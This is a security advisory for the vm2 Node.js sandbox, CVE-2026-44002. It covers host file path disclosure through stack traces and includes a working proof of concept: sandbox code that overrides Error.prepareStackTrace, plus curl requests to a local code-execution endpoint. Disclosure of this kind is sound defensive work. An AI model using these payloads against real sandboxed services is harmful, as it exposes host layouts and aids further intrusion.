GHSA-V27G-JCQJ-V8RW
Vulnerability from github – Published: 2026-05-07 04:30 – Updated: 2026-05-14 20:36
VLAI
Summary
vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak
Details
Summary
vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.
Details
In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:
getFileName()— returns host absolute paths like/app/node_modules/vm2/lib/vm.jsgetLineNumber(),getColumnNumber()— exact source locationsgetFunctionName(),getMethodName(),getTypeName()— internal function names
Two exploitation paths exist:
1. Default error.stack: new Error().stack includes host frame paths in the formatted string
2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths
PoC
Library-level PoC (Node.js script — primary):
const { VM } = require("vm2");
const vm = new VM();
// Path A — Default error.stack
const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
console.log(result1);
// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
// /app/src/server.js:49:20
// Path B — prepareStackTrace extraction
const result2 = vm.run(`
Error.prepareStackTrace = function(e, sst) {
return sst.map(function(s) { return s.getFileName(); }).join(", ");
};
new Error().stack
`);
console.log(result2);
// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...
HTTP demonstration:
# Default error.stack
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"try { null.x; } catch(e) { e.stack }"}'
# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
# prepareStackTrace extraction
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...
Impact
- Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
- Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
- Scope: All applications using vm2. No special configuration required.
Severity
5.8 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.5"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44002"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T04:30:10Z",
"nvd_published_at": "2026-05-13T18:16:16Z",
"severity": "MODERATE"
},
"details": "### Summary\nvm2\u0027s `CallSite` wrapper class (intended as a safe wrapper for V8\u0027s native CallSite) blocks `getThis()` and `getFunction()` to prevent host object leakage, but allows `getFileName()` to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.\n\n### Details\nIn `lib/setup-sandbox.js:436-466`, the `CallSite` class overrides `getThis()` and `getFunction()` with `undefined` to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:\n\n- `getFileName()` \u2014 returns host absolute paths like `/app/node_modules/vm2/lib/vm.js`\n- `getLineNumber()`, `getColumnNumber()` \u2014 exact source locations\n- `getFunctionName()`, `getMethodName()`, `getTypeName()` \u2014 internal function names\n\nTwo exploitation paths exist:\n1. **Default `error.stack`**: `new Error().stack` includes host frame paths in the formatted string\n2. **Custom `prepareStackTrace`**: Attacker can set `Error.prepareStackTrace` to directly call `getFileName()` on each CallSite, extracting a clean list of all host paths\n\n### PoC\n\n**Library-level PoC (Node.js script \u2014 primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Path A \u2014 Default error.stack\nconst result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);\nconsole.log(result1);\n// Output includes: /app/node_modules/vm2/lib/vm.js:289:18\n// /app/src/server.js:49:20\n\n// Path B \u2014 prepareStackTrace extraction\nconst result2 = vm.run(`\n Error.prepareStackTrace = function(e, sst) {\n return sst.map(function(s) { return s.getFileName(); }).join(\", \");\n };\n new Error().stack\n`);\nconsole.log(result2);\n// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...\n```\n\n**HTTP demonstration:**\n```bash\n# Default error.stack\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\":\"try { null.x; } catch(e) { e.stack }\"}\u0027\n# Result includes host paths: /app/src/server.js, /app/node_modules/express/...\n\n# prepareStackTrace extraction\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\":\"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\\\", \\\"); }; new Error().stack\"}\u0027\n# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...\n```\n\n### Impact\n- **Information Disclosure**: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.\n- **Attack Chain**: Leaked paths enable precise targeting for other vulnerabilities.\n- **Scope**: All applications using vm2. No special configuration required.",
"id": "GHSA-v27g-jcqj-v8rw",
"modified": "2026-05-14T20:36:52Z",
"published": "2026-05-07T04:30:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44002"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…